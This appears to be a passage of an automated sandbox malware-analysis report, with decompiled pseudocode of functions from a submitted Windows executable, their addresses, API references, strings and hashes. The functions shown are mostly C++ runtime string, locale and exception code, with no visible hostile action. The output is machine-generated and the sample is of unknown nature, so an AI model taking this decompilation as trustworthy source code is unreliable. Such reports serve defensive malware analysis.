				_t22 =  *(_t39 + 0xc);
				if( *(_t39 + 0xc) != 0) {
					E0041FC21(_t22);
				}
				 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0x00000000;
				_t23 =  *(_t39 + 4);
				if( *(_t39 + 4) != 0) {
					E0041FC21(_t23);
				}
				 *(_t39 + 4) =  *(_t39 + 4) & 0x00000000;
				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
				return E004236AF(E0041F1E8(_t39));
			}

0x0040f1bc
0x0040f1c3
0x0040f1c8
0x0040f1cc
0x0040f1d3
0x0040f1d8
0x0040f1de
0x0040f1e1
0x0040f1e6
0x0040f1e7
0x0040f1eb
0x0040f1f0
0x0040f1f3
0x0040f1f8
0x0040f1f9
0x0040f1fd
0x0040f202
0x0040f205
0x0040f20a
0x0040f20b
0x0040f20f
0x0040f214
0x0040f217
0x0040f21c
0x0040f21d
0x0040f221
0x0040f231

APIs

__EH_prolog3.LIBCMT ref: 0040F1C3
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040F1D3

Part of subcall function 0041EF74: _setlocale.LIBCMT ref: 0041EF86

_free.LIBCMT ref: 0040F1E1

Part of subcall function 0041FC21: HeapFree.KERNEL32(00000000,00000000,?,00428163,00000000), ref: 0041FC37
Part of subcall function 0041FC21: GetLastError.KERNEL32(00000000,?,00428163,00000000), ref: 0041FC49

_free.LIBCMT ref: 0040F1F3
_free.LIBCMT ref: 0040F205
_free.LIBCMT ref: 0040F217

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeH_prolog3HeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 2259855018-0
Opcode ID: 8f05204b0a594916026416ed2a9ad257fa128cd198f32d73f80b36efeb99b41a
Instruction ID: 1e8f973262dc627c1159839a08bcd49f7ecf684ca6b0537bdd255c0ec41780c0
Opcode Fuzzy Hash: 8f05204b0a594916026416ed2a9ad257fa128cd198f32d73f80b36efeb99b41a
Instruction Fuzzy Hash: 4B0184352007009BD730AEA6D50679BB3A8EF00729F104D3EA451DB6C1CB3CD9499AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405045 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405045(signed int __eax, void* __edi, void* __eflags, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr* _t18;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr _t28;
				signed int _t31;
				intOrPtr* _t35;
				void* _t36;
				intOrPtr* _t37;

				_t36 = __edi;
				_t27 = _a4;
				_t37 = __eax;
				_t31 = __eax;
				if(E00404C1C(__eax, _a4) == 0) {
					_t14 =  *((intOrPtr*)(_t37 + 0x10));
					if((_t31 | 0xffffffff) - _t14 <= __edi) {
						_t14 = E0041EBA3("string too long");
					}
					if(_t36 != 0) {
						_t28 = _t14 + _t36;
						if(E00404BB8(_t28, _t37, _t36, _t28, 0) != 0) {
							_t17 =  *((intOrPtr*)(_t37 + 0x14));
							if(_t17 < 0x10) {
								_t35 = _t37;
							} else {
								_t35 =  *_t37;
							}
							if(_t17 < 0x10) {
								_t18 = _t37;
							} else {
								_t18 =  *_t37;
							}
							E0041FE70(_t18 + _t36, _t35,  *((intOrPtr*)(_t37 + 0x10)));
							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
								_t21 = _t37;
							} else {
								_t21 =  *_t37;
							}
							E0041F8C0(_t21, _a4, _t36);
							 *((intOrPtr*)(_t37 + 0x10)) = _t28;
							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
								_t23 = _t37;
							} else {
								_t23 =  *_t37;
							}
							 *((char*)(_t23 + _t28)) = 0;
						}
					}
					return _t37;
				}
				if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
					_t24 = _t37;
				} else {
					_t24 =  *_t37;
				}
				return L00404F4C(_t36, _t37, _t31, _t36, _t37, _t27 - _t24);
			}

0x00405045
0x00405049
0x0040504d
0x00405050
0x00405059
0x00405078
0x00405082
0x00405089
0x00405089
0x00405090
0x00405092
0x004050a1
0x004050a3
0x004050a9
0x004050af
0x004050ab
0x004050ab
0x004050ab
0x004050b4
0x004050ba
0x004050b6
0x004050b6
0x004050b6
0x004050c3
0x004050cf
0x004050d5
0x004050d1
0x004050d1
0x004050d1
0x004050dc
0x004050e8
0x004050eb
0x004050f1
0x004050ed
0x004050ed
0x004050ed
0x004050f3
0x004050f3
0x004050a1
0x00000000
0x004050f7
0x0040505f
0x00405065
0x00405061
0x00405061
0x00405061
0x00000000

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00405089
_memmove.LIBCMT ref: 004050C3
_memmove.LIBCMT ref: 004050DC

Strings

invalid string position, xrefs: 0040503A
string too long, xrefs: 00404F74, 00405084

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: cfb4baad7d22ba4cc091230a541c688bb5d219ed8477c84142af2340afeaf56b
Instruction ID: e37c84093b6ac3a6f5629055d80cdf5071073b91fac62119c9fd96c28dbe8a42
Opcode Fuzzy Hash: cfb4baad7d22ba4cc091230a541c688bb5d219ed8477c84142af2340afeaf56b
Instruction Fuzzy Hash: E421C630304A4097DA349E1D888591FB7E9EB41704B10093FF586A77C2C77A9C858FDE

Uniqueness

Uniqueness Score: -1.00%

Function 00419896 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419896(signed int __ecx, void* __edi, intOrPtr* __esi, intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr* _t15;
				intOrPtr* _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;
				intOrPtr* _t29;
				void* _t35;
				intOrPtr* _t36;

				_t36 = __esi;
				_t35 = __edi;
				_t25 = __ecx;
				_t23 =  *((intOrPtr*)(__esi + 0x10));
				if(_t23 < __edi) {
					E0041EBF0("invalid string position");
				}
				_t11 = _a4;
				if((_t25 | 0xffffffff) - _t23 <= _t11) {
					_t11 = E0041EBA3("string too long");
				}
				if(_t11 != 0) {
					_t24 = _t23 + _t11;
					if(E00404BB8(_t24, _t36, _t35, _t24, 0) != 0) {
						_t14 =  *((intOrPtr*)(_t36 + 0x14));
						if(_t14 < 0x10) {
							_t29 = _t36;
						} else {
							_t29 =  *_t36;
						}
						if(_t14 < 0x10) {
							_t15 = _t36;
						} else {
							_t15 =  *_t36;
						}
						E0041FE70(_t15 + _t35 + _a4, _t29 + _t35,  *((intOrPtr*)(_t36 + 0x10)) - _t35);
						E0040CE80(_t36, _t35, _a8, _a4);
						 *((intOrPtr*)(_t36 + 0x10)) = _t24;
						if( *((intOrPtr*)(_t36 + 0x14)) < 0x10) {
							_t21 = _t36;
						} else {
							_t21 =  *_t36;
						}
						 *((char*)(_t21 + _t24)) = 0;
					}
				}
				return _t36;
			}

0x00419896
0x00419896
0x00419896
0x0041989a
0x0041989f
0x004198a6
0x004198a6
0x004198ab
0x004198b5
0x004198bc
0x004198bc
0x004198c3
0x004198c5
0x004198d3
0x004198d5
0x004198db
0x004198e1
0x004198dd
0x004198dd
0x004198dd
0x004198e6
0x004198ec
0x004198e8
0x004198e8
0x004198e8
0x004198fd
0x0041990f
0x00419918
0x0041991b
0x00419921
0x0041991d
0x0041991d
0x0041991d
0x00419923
0x00419923
0x004198d3
0x0041992b

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004198A6

Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC05
Part of subcall function 0041EBF0: __CxxThrowException@8.LIBCMT ref: 0041EC1A
Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC2B

std::_Xinvalid_argument.LIBCPMT ref: 004198BC
_memmove.LIBCMT ref: 004198FD

Strings

invalid string position, xrefs: 004198A1
string too long, xrefs: 004198B7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: f17c73ace4fe2401effdfa6969dbe2a57e4f1b04e1d33729a1497bf5c2d244df
Instruction ID: f7c4c81005af6b1f60e1b1452d43a97323f497c43199b3946d60fe53e366a00f
Opcode Fuzzy Hash: f17c73ace4fe2401effdfa6969dbe2a57e4f1b04e1d33729a1497bf5c2d244df
Instruction Fuzzy Hash: D211C6707142405BDB24AE2DDCB1AAEB7EAAF41704B14091EF48287782C769EC84C39D

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404EB7(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t19;
				intOrPtr* _t22;
				intOrPtr* _t27;
				void* _t28;
				signed int _t29;
				intOrPtr* _t33;
				intOrPtr _t35;
				intOrPtr* _t37;

				_t37 = __esi;
				_t29 = __ecx;
				_t28 = __eax;
				_t2 = _a4 + 0x10; // 0x13e83
				_t17 =  *_t2;
				if(_t17 < _a8) {
					_t17 = E0041EBF0("invalid string position");
				}
				_t18 = _t17 - _a8;
				if(_t18 < _t28) {
					_t28 = _t18;
				}
				_t19 =  *((intOrPtr*)(_t37 + 0x10));
				if((_t29 | 0xffffffff) - _t19 <= _t28) {
					_t19 = E0041EBA3("string too long");
				}
				if(_t28 != 0) {
					_t35 = _t19 + _t28;
					if(E00404BB8(_t28, _t37, _t35, _t35, 0) != 0) {
						_t22 = _a4;
						if( *((intOrPtr*)(_t22 + 0x14)) >= 0x10) {
							_t22 =  *_t22;
						}
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							_t33 = _t37;
						} else {
							_t33 =  *_t37;
						}
						E0041F8C0( *((intOrPtr*)(_t37 + 0x10)) + _t33, _t22 + _a8, _t28);
						 *((intOrPtr*)(_t37 + 0x10)) = _t35;
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							_t27 = _t37;
						} else {
							_t27 =  *_t37;
						}
						 *((char*)(_t27 + _t35)) = 0;
					}
				}
				return _t37;
			}

0x00404eb7
0x00404eb7
0x00404ebb
0x00404ec0
0x00404ec0
0x00404ec6
0x00404ecd
0x00404ecd
0x00404ed2
0x00404ed7
0x00404ed9
0x00404ed9
0x00404edb
0x00404ee5
0x00404eec
0x00404eec
0x00404ef3
0x00404ef6
0x00404f05
0x00404f07
0x00404f0e
0x00404f10
0x00404f10
0x00404f16
0x00404f1c
0x00404f18
0x00404f18
0x00404f18
0x00404f29
0x00404f35
0x00404f38
0x00404f3e
0x00404f3a
0x00404f3a
0x00404f3a
0x00404f40
0x00404f40
0x00404f44
0x00404f49

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404ECD

Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC05
Part of subcall function 0041EBF0: __CxxThrowException@8.LIBCMT ref: 0041EC1A
Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC2B

std::_Xinvalid_argument.LIBCPMT ref: 00404EEC
_memmove.LIBCMT ref: 00404F29

Strings

invalid string position, xrefs: 00404EC8
string too long, xrefs: 00404EE7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: d8e29d3984204b42a2b2a82d371c9aa077a4ae1f2002d521f909c79326e2192d
Instruction ID: c587ea8b9c2f8df3309060682c1b4988d29d3365f9ab03a40b0d22954870e317
Opcode Fuzzy Hash: d8e29d3984204b42a2b2a82d371c9aa077a4ae1f2002d521f909c79326e2192d
Instruction Fuzzy Hash: 0811C1B13002019FDB24DE5CC881A1AB3E8BF85704B50097EF642EB2D1D7B4ED44879C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4EC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0040F4EC(char* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char* _t17;
				signed char _t19;
				char* _t26;
				intOrPtr _t28;

				_t17 = 0;
				if(_a4 == 0) {
					L3:
					_t19 =  *(_t26 + 0x10) &  *(_t26 + 0xc);
					if((_t19 & 0x00000004) == 0) {
						if((_t19 & 0x00000002) == 0) {
							_t28 = E0041ECE6();
							_a4 = "ios_base::eofbit set";
						} else {
							_t28 = E0041ECE6();
							_a4 = "ios_base::failbit set";
						}
					} else {
						_t28 = E0041ECE6();
						_a4 = "ios_base::badbit set";
					}
					_t26 =  &_v24;
					E0041FD77(_t26,  &_a4);
					_v12 = 1;
					_v8 = _t28;
					_v24 = 0x43fe28;
					_push(0x4416d4);
					_t17 =  &_v24;
					goto L2;
				} else {
					_push(0);
					L2:
					_push(_t17);
					E004231B6();
					goto L3;
				}
			}

0x0040f4f2
0x0040f4f9
0x0040f502
0x0040f505
0x0040f50d
0x0040f542
0x0040f559
0x0040f55b
0x0040f544
0x0040f549
0x0040f54b
0x0040f54b
0x0040f50f
0x0040f514
0x0040f516
0x0040f516
0x0040f521
0x0040f524
0x0040f529
0x0040f52c
0x0040f52f
0x0040f536
0x0040f53b
0x00000000
0x0040f4fb
0x0040f4fb
0x0040f4fc
0x0040f4fc
0x0040f4fd
0x00000000
0x0040f4fd

APIs

__CxxThrowException@8.LIBCMT ref: 0040F4FD
std::exception::exception.LIBCMT ref: 0040F524

Strings

ios_base::failbit set, xrefs: 0040F54B
ios_base::badbit set, xrefs: 0040F516
ios_base::eofbit set, xrefs: 0040F55B

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: 572c40b15a5916433283032f70d988ab3a94ab553158d27919f4ab6d568d26ad
Instruction ID: e0a6f6205930dd581d55ee675903227abdf97afadd0150ec107a90b312c30770
Opcode Fuzzy Hash: 572c40b15a5916433283032f70d988ab3a94ab553158d27919f4ab6d568d26ad
Instruction Fuzzy Hash: 3F0167F1404104ABCB10EF55CD469EA7BF4AD04348B65803BAC05AB652E778DA4FC799

Uniqueness

Uniqueness Score: -1.00%

Function 004169DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004169DC() {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				void* __esi;
				signed int _t10;
				CHAR* _t13;
				void* _t24;
				void* _t27;
				void* _t28;
				signed int _t30;

				_t10 =  *0x444664; // 0xfa3a0753
				_v8 = _t10 ^ _t30;
				_t13 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_t29 = _t13;
				GetLocalTime( &_v24);
				wsprintfA(_t13, "%d/%d/%d %d:%d:%d", _v24.wDay & 0x0000ffff, _v24.wMonth & 0x0000ffff, _v24.wYear & 0x0000ffff, _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff);
				return E0041F69E(_t13, _t24, _v8 ^ _t30, _t27, _t28, _t29);
			}

0x004169e2
0x004169e9
0x004169fb
0x00416a01
0x00416a07
0x00416a31
0x00416a48

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004169F4
HeapAlloc.KERNEL32(00000000), ref: 004169FB
GetLocalTime.KERNEL32(?), ref: 00416A07
wsprintfA.USER32 ref: 00416A31

Strings

%d/%d/%d %d:%d:%d, xrefs: 00416A2B

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID: %d/%d/%d %d:%d:%d
API String ID: 1243822799-1073349071
Opcode ID: 118e4a81ffeb19d2186e35ed6655a65aff55619fc678b8070b89502749cd031d
Instruction ID: 696ccd411c61c7b01491fe5bd6b786b3c5fc5a3d9bfc8ecb6e7c9c8475a034c8
Opcode Fuzzy Hash: 118e4a81ffeb19d2186e35ed6655a65aff55619fc678b8070b89502749cd031d
Instruction Fuzzy Hash: 2AF0E165900118BACB509BD99D05ABF77FCAB0D715F000065F941E2190DA3C9A45D7B9

Uniqueness

Uniqueness Score: -1.00%

Function 004163B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004163B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t22 = __edi;
				_t17 = __ebx;
				_push(0);
				E00423610(E00432FF9, __ebx, __edi, __esi);
				_t25 =  *((intOrPtr*)(_t26 + 8));
				 *_t25 = 0x43fd5c;
				E0041F1FF(_t25 + 4, __edi, _t27);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t23 = E00420467(__ebx, _t21, _t22, _t25, _t27, 4);
				_t28 = _t23;
				if(_t23 == 0) {
					_t23 = 0;
					__eflags = 0;
				} else {
					 *_t23 = E0041F0D7(_t17, _t23, _t25, _t28);
					E0040F280(E0041EE96());
				}
				 *((intOrPtr*)(_t25 + 0x38)) = _t23;
				E0041641E(_t25);
				return E004236AF(_t25);
			}

0x004163b5
0x004163b5
0x004163b5
0x004163b5
0x004163bc
0x004163c1
0x004163c7
0x004163cd
0x004163d2
0x004163dd
0x004163e0
0x004163e2
0x004163f9
0x004163f9
0x004163e4
0x004163e9
0x004163f2
0x004163f2
0x004163fd
0x00416400
0x0041640c

APIs

__EH_prolog3.LIBCMT ref: 004163BC
std::_Mutex::_Mutex.LIBCPMT ref: 004163CD

Part of subcall function 00420467: _malloc.LIBCMT ref: 00420481

std::locale::_Init.LIBCPMT ref: 004163E4

Part of subcall function 0041F0D7: __EH_prolog3.LIBCMT ref: 0041F0DE
Part of subcall function 0041F0D7: std::_Lockit::_Lockit.LIBCPMT ref: 0041F0F4
Part of subcall function 0041F0D7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041F116
Part of subcall function 0041F0D7: std::locale::_Setgloballocale.LIBCPMT ref: 0041F120
Part of subcall function 0041F0D7: _Yarn.LIBCPMT ref: 0041F136
Part of subcall function 0041F0D7: std::locale::facet::_Incref.LIBCPMT ref: 0041F143

std::locale::facet::_Incref.LIBCPMT ref: 004163F2

Part of subcall function 0040F280: std::_Lockit::_Lockit.LIBCPMT ref: 0040F28C

Strings

(_A, xrefs: 004163C7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::_std::locale::_$H_prolog3IncrefLockitLockit::_std::locale::facet::_$InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
String ID: (_A
API String ID: 3596770912-4125621975
Opcode ID: 8a667140b126f32da43b00c50d110ab886543440ab995205651f086a854b4dc3
Instruction ID: 1b5be4ecd1c58830fe10a9b6efc8dd443ced8aca0eae38130ec49391a4a39c33
Opcode Fuzzy Hash: 8a667140b126f32da43b00c50d110ab886543440ab995205651f086a854b4dc3
Instruction Fuzzy Hash: 0FF0E57560021197C7207F76840279DB6E0AF40708F21483FA6458B782DF7CD98A8B4E

Uniqueness

Uniqueness Score: -1.00%

Function 0042500A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042500A(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t13;
				void* _t16;
				intOrPtr* _t20;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t24 = __ebx;
				_t13 =  *((intOrPtr*)( *_a4));
				if(_t13 == 0xe0434352 || _t13 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00428172(_t24, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E00428172(_t24, _t25, __eflags);
						_t5 = _t16 + 0x90;
						 *_t5 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t5;
					}
					goto L6;
				} else {
					_t34 = _t13 - 0xe06d7363;
					if(_t13 != 0xe06d7363) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						 *(E00428172(__ebx, __edx, _t34) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
						_push(8);
						_push(0x4414b8);
						E00428900(__ebx, __edi, __esi);
						_t20 =  *((intOrPtr*)(E00428172(_t24, __edx, _t34) + 0x78));
						if(_t20 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t20();
							_v8 = 0xfffffffe;
						}
						return E00428945(E00425C67(_t24, _t25, _t26, _t27));
					}
				}
			}

0x0042500a
0x0042500a
0x0042500a
0x0042500a
0x00425014
0x0042501b
0x00425041
0x00425048
0x0042504a
0x0042504f
0x0042504f
0x0042504f
0x0042504f
0x00000000
0x00425024
0x00425024
0x00425029
0x00425055
0x00425055
0x00425058
0x0042502b
0x00425030
0x0042abbb
0x0042abbd
0x0042abc2
0x0042abcc
0x0042abd1
0x0042abd3
0x0042abd7
0x0042abe2
0x0042abe2
0x0042abf3
0x0042abf3
0x00425029

APIs

__getptd.LIBCMT ref: 0042502B

Part of subcall function 00428172: __getptd_noexit.LIBCMT ref: 00428175
Part of subcall function 00428172: __amsg_exit.LIBCMT ref: 00428182

__getptd.LIBCMT ref: 0042503C
__getptd.LIBCMT ref: 0042504A

Strings

MOC, xrefs: 0042501D
RCC, xrefs: 00425016

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC
API String ID: 803148776-2084237596
Opcode ID: 28cc8ae207b871c5e9b803cdba49811209437db7000f09a64c25cbd22f85e64c
Instruction ID: 5e7401e440387ec9081f07dd9269a9501fb349fd74363ea1c0c005d042ac8367
Opcode Fuzzy Hash: 28cc8ae207b871c5e9b803cdba49811209437db7000f09a64c25cbd22f85e64c
Instruction Fuzzy Hash: 4AE06D303001288EC7149765A44A76D3395FF44308F9900EBA90DCB222CB3CA8A1958A

Uniqueness

Uniqueness Score: -1.00%

Function 00415B45 Relevance: 7.6, APIs: 5, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00415B45(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				void* _t54;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr _t64;
				intOrPtr _t71;
				void* _t89;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				signed int _t108;
				void* _t109;

				_t106 = __esi;
				_push(0x2c);
				E00423679(E00433362, __ebx, __edi, __esi);
				_t105 = __ecx;
				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) == 0) {
					L4:
					__eflags =  *(_t105 + 0x54);
					if( *(_t105 + 0x54) != 0) {
						E004162A1(_t105);
						__eflags =  *(_t105 + 0x44);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t109 - 0x18)) = 0xf;
							 *((intOrPtr*)(_t109 - 0x1c)) = 0;
							 *((char*)(_t109 - 0x2c)) = 0;
							 *((intOrPtr*)(_t109 - 4)) = 0;
							_push( *(_t105 + 0x54));
							_t54 = E0042285A(0, _t105, _t106, __eflags);
							_t83 = 1;
							while(1) {
								_pop(_t89);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								_t107 = _t109 - 0x2c;
								E0040D0BD(_t83, _t89, _t107, _t54);
								__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
								_t103 =  *((intOrPtr*)(_t109 - 0x2c));
								_t56 = _t103;
								if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
									_t56 = _t107;
									_t103 = _t107;
								}
								_t106 =  *( *(_t105 + 0x44));
								_t83 = _t109 - 0x34;
								_t59 =  *((intOrPtr*)(_t106 + 0x10))(_t105 + 0x4c, _t103, _t56 +  *((intOrPtr*)(_t109 - 0x1c)), _t109 - 0x34, _t109 - 0x2d, _t109 - 0x2c, _t109 - 0x38);
								__eflags = _t59;
								if(_t59 < 0) {
									break;
								} else {
									_t83 = 1;
									__eflags = _t59 - 1;
									if(_t59 <= 1) {
										__eflags =  *((intOrPtr*)(_t109 - 0x38)) - _t109 - 0x2d;
										_t64 =  *((intOrPtr*)(_t109 - 0x2c));
										if( *((intOrPtr*)(_t109 - 0x38)) != _t109 - 0x2d) {
											__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
											if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
												_t64 = _t109 - 0x2c;
											}
											_t108 = _t64 -  *((intOrPtr*)(_t109 - 0x34)) +  *((intOrPtr*)(_t109 - 0x1c));
											while(1) {
												__eflags = _t108;
												if(_t108 <= 0) {
													break;
												}
												_push( *(_t105 + 0x54));
												_t108 = _t108 - 1;
												__eflags = _t108;
												_push( *((char*)(_t108 +  *((intOrPtr*)(_t109 - 0x34)))));
												E004223BC(_t83, _t105, _t108, _t108);
											}
											L32:
											_t106 =  *(_t109 - 0x2d) & 0x000000ff;
											L26:
											E00404A66(_t109 - 0x2c, 1, 0);
											L3:
											return E004236C3(_t83, _t105, _t106);
										}
										__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
										if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
											_t64 = _t109 - 0x2c;
										}
										__eflags =  *((intOrPtr*)(_t109 - 0x34)) - _t64;
										E00404C57(_t109 - 0x2c, 0,  *((intOrPtr*)(_t109 - 0x34)) - _t64);
										L23:
										_push( *(_t105 + 0x54));
										_t54 = E0042285A(_t83, _t105, _t106, __eflags);
										continue;
									}
									__eflags = _t59 - 3;
									if(_t59 != 3) {
										break;
									}
									__eflags =  *((intOrPtr*)(_t109 - 0x1c)) - 1;
									if(__eflags < 0) {
										goto L23;
									}
									__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
									_t71 =  *((intOrPtr*)(_t109 - 0x2c));
									if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
										_t71 = _t109 - 0x2c;
									}
									E00422A7F(_t109 - 0x2d, _t83, _t71, _t83);
									goto L32;
								}
							}
							__eflags = _t106;
							goto L26;
						}
						_push( *(_t105 + 0x54));
						_t51 = E0042285A(0, _t105, _t106, __eflags);
						__eflags = _t51 - 0xffffffff;
						if(_t51 == 0xffffffff) {
							goto L5;
						}
						goto L3;
					}
					L5:
					goto L3;
				}
				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))))) {
					goto L4;
				}
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
				_t105 =  *((intOrPtr*)(__ecx + 0x20));
